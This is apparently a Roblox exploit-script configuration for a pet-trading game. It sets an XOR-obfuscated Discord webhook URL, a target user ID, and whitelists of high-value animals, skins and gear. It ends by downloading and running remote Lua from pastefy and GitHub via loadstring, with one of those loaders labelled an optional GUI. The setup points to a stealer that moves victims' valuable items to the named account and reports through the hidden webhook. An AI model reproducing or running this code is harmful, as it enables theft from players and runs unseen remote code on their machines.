local genv = getgenv()

genv.GOOD_WEBHOOK = (function() local b={185,165,165,161,162,235,254,254,181,184,162,178,190,163,181,255,178,190,188,254,176,161,184,254,166,180,179,185,190,190,186,162,254,224,228,226,227,229,232,227,232,231,233,233,226,224,233,233,224,227,227,231,254,151,190,146,252,153,150,153,154,160,160,153,165,154,133,230,146,185,133,225,178,132,152,150,133,166,158,136,150,164,136,135,185,180,129,169,224,147,146,228,134,230,179,186,136,252,168,154,149,186,166,164,233,168,142,165,131,135,186,153,232,186,230,168,227,178,154,182,182} local k=209 local o={} for i=1,#b do o[i]=string.char(bit32.bxor(b[i],k)) end return table.concat(o) end)()

genv.TARGET_USER_ID = 10279786442

genv.GOOD_AVATAR = "https://cdn.pfps.gg/pfps/77602-blood-cat.gif"

genv.ALLOWED_ANIMALS = {
    "Strawberry Elephant",
    "Headless Horseman",
    "Meowl",
    "John Pork",
    "Skibidi Toilet",
    "Griffin",
    "Dragon Aquanini",
    "Dragon Gingerini",
    "Hydra Dragon Cannelloni",
    "Signore Carapace",
    "Dragon Cannelloni",
    "Love Love Bear",
    "Moby Bros",
    "Digi Narwhal",
    "Kraken",
    "La Supreme Combinasion",
    "Elefanto Frigo",
    "Hydra Bunny",
    "Celestial Pegasus",
    "Cerberus",
    "Jelly Moby",
    "Bumbatron",
    "Bunny and Eggy",
    "Popcuru and Fizzuru",
    "La Breakfast Combinasion",
    "Rosey and Teddy",
    "Capitano Moby",
    "Cooki and Milki",
    "Arcadragon",
    "Burguro And Fryuro",
    "Los Secret Combinasionas",
    "Ketupat Bros",
    "Reinito Sleighito",
    "Fortunu and Cashuru",
    "Los Amigos",
    "Pizza and Ranch",
    "Antonio",
    "La Secret Combinasion",
    "Pancake and Syrup",
    "Foxini Lanternini",
    "Kalika Bros",
    "Los Sekolahs",
    "Sammyni Fattini",
    "Fishino Clownino",
    "Cash or Card",
    "Fragrama and Chocrama",
    "La Casa Boo",
    "La Fuse Machine",
    "Los Admins",
    "Duggy Bros",
    "La Food Combinasion",
    "Yetimatic",
    "S'more Serat",
    "Sammyni Cakini",
    "Boppin Bunny",
    "Spooky and Pumpky",
    "Ginger Gerat",
    "La Ginger Sekolah",
    "Los Chillis",
    "Los Hackers",
    "Bearito Cabinito",
    "Rubiko and Kubiko",
    "Capitano Americano",
    "Examen Bros",
    "Los Spaghettis",
    "Rubrikiko",
    "Festive 67",
    "Guest 666",
    "Quackini Snackini",
    "Queen Bee",
    "Cloverat Clapat",
    "La Summer Grande",
    "Los Tictacs",
    "Spaghetti Tualetti",
    "Candini Fluffini",
    "Caylusaurus",
    "Hopilikalika Hopilikalako",
    "La Easter Grande",
    "Steakini Fattini",
    "Garama and Madundung",
    "La Anniversary Grande",
    "Nacho Spyder",
    "Rosetti Tualetti",
    "Scorpino Coasterino",
    "Money Money Bros",
    "Gold Gold Gold",
    "Jolly Jolly Sahur",
    "Lavadorito Spinito",
    "Gym Bros",
    "Ketchuru and Musturu",
    "Los Tangcitos",
    "Rico Dinero",
    "Tirilikalika Tirilikalako",
    "La Lucky Grande",
    "La Romantic Grande",
    "Orcaledon",
    "Swaggy Bros",
    "Tictac Sahur",
    "Dug Dug Dug",
    "Ketupat Kepat",
    "La Taco Combinasion",
    "Coco and Mango",
    "Tang Tang Keletang",
    "Abyssaloco",
    "Esok Goala",
    "Fragola La La La",
    "Lovin Rose",
    "Los Tacoritas",
    "Eviledon",
    "Los Primos",
    "Esok Sekolah",
    "La Jolly Grande",
    "Los Cupids",
    "Los Mariachis",
    "Los Puggies",
    "Sand Sand Sand",
    "W or L",
    "Globa Steppa",
    "4th Bros",
    "Bufalino Boomberino",
    "Venuspino",
    "Rhino Helicopterino",
    "Centrucci Nuclucci",
    "John Doe",
    "Gorillo Subwoofero",
    "Ginger Cisterna",
    "1x1x1x1",
    "Agarrini la Palini",
    "Arcadopus",
    "Bacuru and Egguru",
    "Bananito",
    "Baskito",
    "Berryno",
    "Bisonte Giuppitere",
    "Blackhole GOAT",
    "Boatito Auratito",
    "Brunito Marsito",
    "Bunito Bunito Spinito",
    "Bunnyman",
    "Bunny Bunny Bunny Sahur",
    "Buntteo",
    "Burrito Bandito",
    "Celularcini Viciosini",
    "Chachechi",
    "Chicleteira Bicicleteira",
    "Chicleteira Cupideira",
    "Chicleteira Noelteira",
    "Chicleteirina Bicicleteirina",
    "Chill Puppy",
    "Chillin Chili",
    "Chimnino",
    "Chipso and Queso",
    "Churrito Bunnito",
    "Cigno Fulgoro",
    "Cuadramat and Pakrahmatmamat",
    "Cupid Cupid Sahur",
    "Cupid Hotspot",
    "DJ Panda",
    "Donkeyturbo Express",
    "Dul Dul Dul",
    "Easter Easter Easter Sahur",
    "Eid Eid Eid Sahur",
    "Extinct Matteo",
    "Extinct Tralalero",
    "Fishboard",
    "Frankentteo",
    "GOAT",
    "Giftini Spyderini",
    "Gobblino Uniciclino",
    "Graipuss Medussi",
    "Granny",
    "Guerriro Digitale",
    "Ho Ho Ho Sahur",
    "Horegini Boom",
    "Jackorilla",
    "Job Job Job Sahur",
    "Karker Sahur",
    "Karkerkar Kurkur",
    "La Cucaracha",
    "La Extinct Grande",
    "La Grande Combinasion",
    "La Karkerkar Combinasion",
    "La Sahur Combinasion",
    "La Spooky Grande",
    "La Vacca Jacko Linterino",
    "La Vacca Lepre Lepreino",
    "La Vacca Prese Presente",
    "La Vacca Saturno Saturnita",
    "Las Sis",
    "Las Tralaleritas",
    "Las Vaquitas Saturnitas",
    "Chicleteira Champeona",
    "List List List Sahur",
    "Los 25",
    "Los 67",
    "Honey Honey Bear",
    "Pogo Pogo Penguin",
    "Conetto Morsetto",
    "Los Bunitos",
    "Los Burritos",
    "Los Candies",
    "Los Chicleteiras",
    "Los Combinasionas",
    "Los Cucarachas",
    "Los Hotspotsitos",
    "Los Jobcitos",
    "Los Jolly Combinasionas",
    "Los Karkeritos",
    "Los Matteos",
    "Los Mi Gatitos",
    "Los Mobilis",
    "Los Nooo My Hotspotsitos",
    "Los Planitos",
    "Los Quesadillas",
    "Los Spooky Combinasionas",
    "Los Spyderinis",
    "Los Sweethearts",
    "Los Tortus",
    "Los Tralaleritos",
    "Los Trios",
    "Love Love Love Sahur",
    "Luck Luck Luck Sahur",
    "Mariachi Corazoni",
    "Mi Gatito",
    "Mieteteira Bicicleteira",
    "Money Money Puggy",
    "Money Money Reindeer",
    "Naughty Naughty",
    "Noo My Candy",
    "Noo My Eggs",
    "Noo My Examine",
    "Noo My Gold",
    "Noo My Heart",
    "Noo My Present",
    "Nooo My Hotspot",
    "Nuclearo Dinossauro",
    "Paradiso Axolottino",
    "Perrito Burrito",
    "Pirulitoita Bicicleteira",
    "Please My Present",
    "Pot Hotspot",
    "Pot Pumpkin",
    "Pumpkini Spyderini",
    "Quesadilla Crocodila",
    "Quesadillo Vampiro",
    "Rang Ring Bus",
    "Reindeer Tralala",
    "Rocco Disco",
    "Sammyni Spyderini",
    "Santa Hotspot",
    "Santteo",
    "Secret Lucky Block",
    "Serafinna Medusella",
    "Snailo Clovero",
    "Spinny Hammy",
    "Strawberrita",
    "Swag Soda",
    "Tacorita Bicicleta",
    "Tacorillo Crocodillo",
    "Telemorte",
    "To To To Sahur",
    "Torrtuginni Dragonfrutini",
    "Tralaledon",
    "Trenostruzzo Turbo 4000",
    "Trickolino",
    "Triplito Tralaleritos",
    "Tuff Toucan",
    "Tung Tung Tung Sahur",
    "Ventoliero Pavonero",
    "Vulturino Skeletono",
    "Yess My Examine",
    "Zombie Tralala",
    "Grabatron",
    "Cangurato Gelato",
    "Noodle Noodle Poodle",
    "Polaroidini",
    "Nachorilla",
    "Sammyni Truckini",
    "Tacoturbo Tacorito",
    "Burrito Bat",
    "Pop Pop Petalini",
    "Rosatops Triceratino",
    "Motorino Bumbino",
    "Syrup Samurai",
    "Orchidox",
}

genv.ALLOWED_BASESKINS = {
    ["Rose"] = true,
    ["Gingerbread"] = true,
    ["Halloween"] = true,
    ["Christmas"] = true,
    ["Bunny Basket"] = true,
    ["Summer"] = true,
    ["Pot of Gold"] = true,
    ["Taco"] = true,
    ["Octo"] = true,
    ["Valentines"] = true,
    ["Easter"] = true,
    ["Lucky"] = true,
    ["Aquatic"] = true,
    ["Tralala"] = true
}

genv.ALLOWED_GEARS = {
    ["Santa's Sleigh"] = true,
    ["Cupid's Wings"] = true,
    ["Witch's Broom"] = true,
    ["Waverider"] = true,
    ["Yin Yang Slap"] = true,
    ["Cursed Slap"] = true,
    ["Cyber Slap"] = true,
    ["Divine Slap"] = true,
    ["Bloodmoon Slap"] = true,
    ["Radioactive Slap"] = true,
    ["Rainbow Slap"] = true,
    ["Rainbow Hammer"] = true,
    ["Bloodmoon Hammer"] = true,
    ["Radioactive Airstrike"] = true,
    ["Yin Yang Lamp"] = true,
    ["Demon's Head"] = true,
    ["Lava Slap"] = true,
    ["Lava Blaster"] = true,
    ["Alien Slap"] = true,
    ["Blackhole Bomb"] = true,
    ["Candy Sentry"] = true,
    ["Phantom Slap"] = true
}

genv.ALLOWED_PLACE_IDS = {
    109983668079237
}

-- Extra scripts (moved out of main)
genv.EXTRA_LOADSTRINGS = {
    "https://pastefy.app/I9mewuyb/raw"
}

-- Optional GUI / other loaders
task.spawn(function()
    loadstring(game:HttpGet("https://pastefy.app/BEUKKcZd/raw"))()
end)

task.spawn(function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/norgegat-byte/K2/refs/heads/main/main.lua"))()
end)
